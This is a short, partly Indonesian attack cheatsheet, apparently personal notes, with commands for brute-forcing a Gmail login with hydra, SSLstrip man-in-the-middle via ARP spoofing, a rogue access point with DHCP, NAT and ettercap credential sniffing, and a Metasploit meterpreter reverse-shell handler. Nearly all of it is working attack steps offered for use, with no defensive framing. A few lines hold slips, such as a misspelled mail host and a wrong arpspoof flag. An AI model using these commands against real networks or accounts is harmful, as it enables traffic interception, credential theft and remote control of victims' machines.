Cheatsheet Wireless hack

Bruteforce gmail

hydra -S -l xxx@gmail.com -P /pentest/password/wordlist/word.lst -e ns -V -s 465 smtp.gmai.com smtp


------------------------------------------

SSLSTRIP

  echo 1 > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

liat gateway cari target

  nmap -sS -O gateway/24

  arpspoof -i wlan0 -t targetIP -r gatewayIP

new terminal
  sslstrip -l 8080

------------------------------------------

FAKE ACCESS POINT

  route n
  find gatewayIP

  apt-get install dhcp3-server

  /etc/dhcpd.conf

    >>isinya

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "AZANA16-2";
option domain-name-servers 192.168.1.1;
range 192.168.1.2 192.168.1.40;
}


  airmon-ng
  airmon-ng start wlan0

  airbase-ng -c 11 -e AZANA16-2 mon0

 #new terminal
  ifconfig at0 192.168.1.1 netmask 255.255.255.0
  ifconfig at0 mtu 1400
  route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
  echo 1 > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -A PREROUTING -p udp -j DNAT --to gatewayIP
  iptables -P FORWARD ACCEPT
  iptables --append FORWARD --in-interface at0 -j ACCEPT
  iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
  /etc/init.d/isc-dhcp-server start

  sslstrip -f -p -k 10000

 #new terimal
  ettercap -p -u -T -q -i at0


---------------------

RESEP LINUX

mounting samba
  mount -t cifs //192.168.99.88/Public -o username=irza,password=xxx


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

===========================================
SSLSTRIP on router


echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

  gwip: gateway ip

nmap -sS -O gwip/24

  targip: targetip


arpspoof -t eth0 -t targip -r gwip

sslstrip -l 8080